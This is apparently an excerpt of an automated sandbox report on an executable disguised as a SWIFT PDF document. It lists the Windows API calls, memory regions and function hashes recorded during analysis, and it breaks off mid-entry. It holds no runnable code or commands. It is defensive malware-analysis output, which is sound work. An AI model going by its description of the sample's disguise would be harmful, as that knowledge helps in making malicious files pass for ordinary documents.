                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1375471231-0
                                                                                                                                • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                                • Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
                                                                                                                                • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                                • Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D
                                                                                                                                APIs
                                                                                                                                • VirtualAlloc.KERNELBASE(00000000), ref: 10002963
                                                                                                                                • GetLastError.KERNEL32 ref: 10002A6A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2471251623.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2471237821.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2471265197.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2471278641.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocErrorLastVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 497505419-0
                                                                                                                                • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                                • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                                                • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                                • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                                                APIs
                                                                                                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                                                                  • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FilePointerwsprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 327478801-0
                                                                                                                                • Opcode ID: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                                                • Instruction ID: c5c3fa32fc6d0159c61c67e46e8878479b4609e7a69e49ca0ebb3ecbbe822ed2
                                                                                                                                • Opcode Fuzzy Hash: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                                                • Instruction Fuzzy Hash: A0E04F71702514EFDB01AFA59E4ACAFBB6AEB40328B14443BF501F00E1DA7D8C019A2D
                                                                                                                                APIs
                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: PrivateProfileStringWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 390214022-0
                                                                                                                                • Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                                • Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
                                                                                                                                • Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                                • Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,0000046C,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Open
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 71445658-0
                                                                                                                                • Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                                                • Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
                                                                                                                                • Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                                                • Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768
                                                                                                                                APIs
                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,?,00000000), ref: 00405CF0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                • Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
                                                                                                                                • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                • Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4
                                                                                                                                APIs
                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,?,00000000,00000000,00000000), ref: 00405CC1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                                • Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
                                                                                                                                • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                                • Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4
                                                                                                                                APIs
                                                                                                                                • VirtualProtect.KERNELBASE(1000405C,?,?,1000404C), ref: 100027E5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2471251623.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2471237821.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2471265197.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2471278641.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 544645111-0
                                                                                                                                • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                                                • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                                                APIs
                                                                                                                                • SetFileAttributesW.KERNELBASE(00000000,?,?), ref: 004015A6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                • Opcode ID: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                                                • Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
                                                                                                                                • Opcode Fuzzy Hash: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                                                • Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,?,00000001,00403F7A), ref: 0040415C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                                                • Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
                                                                                                                                • Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                                                • Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08
                                                                                                                                APIs
                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FilePointer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 973152223-0
                                                                                                                                • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                                • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                                                • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                                • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                                                • ShowWindow.USER32(?,?), ref: 00405440
                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                                  • Part of subcall function 0040414E: SendMessageW.USER32(?,?,00000001,00403F7A), ref: 0040415C
                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                                                • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                                                • ShowWindow.USER32(?,?), ref: 004054F1
                                                                                                                                • ShowWindow.USER32(?), ref: 0040553B
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                                                • CreatePopupMenu.USER32 ref: 00405580
                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                                                • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                                                • EmptyClipboard.USER32 ref: 0040561B
                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                                                • CloseClipboard.USER32 ref: 00405676
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                • String ID: {
                                                                                                                                • API String ID: 590372296-366298937
                                                                                                                                • Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                                                • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                                                • Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                                                • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                                                • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 0040471B
                                                                                                                                • lstrcatW.KERNEL32(?,Call), ref: 00404727
                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                                  • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                                  • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                                  • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                  • Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                                  • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                                  • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                  • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                                  • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$Call
                                                                                                                                • API String ID: 2624150263-3131679198
                                                                                                                                • Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                                                • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
